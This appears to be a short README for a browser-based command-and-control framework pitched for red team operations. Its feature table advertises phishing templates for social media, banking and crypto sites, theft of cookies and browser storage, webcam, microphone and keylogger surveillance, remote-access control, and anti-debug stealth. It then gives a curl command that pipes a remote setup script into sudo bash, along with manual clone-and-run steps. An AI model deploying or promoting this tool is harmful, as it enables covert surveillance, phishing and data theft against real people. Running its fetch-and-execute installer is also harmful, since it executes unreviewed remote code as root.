The most advanced browser-based C2 framework for red team operations. Bypasses corporate firewalls using WebRTC technology.
| Category | Features |
|---|---|
| Phishing | 30+ Templates (Instagram, Facebook, Google, Banking, Crypto) |
| Persistence | Service Workers, LocalStorage, Boot Persistence |
| Data Theft | Cookies, localStorage, sessionStorage, Clipboard |
| Surveillance | Webcam, Microphone, Screenshot, Keylogger, Geolocation |
| Network | Internal Network Scanner, Local IP Detection |
| Browser Control | Full RAT capabilities, JavaScript Execution |
| Stealth | Anti-debug, Anti-VM, Console Cleaning |
| Tunneling | Ngrok, Cloudflare, Custom Domain Support |
# One-command deployment
curl -sL https://raw.githubusercontent.com/debjit604/WEBRTC-C2/main/setup.sh | sudo bash
# OR manual
git clone https://github.com/debjit604/WEBRTC-C2.git
cd project-phoenix-c2
npm install
node server.js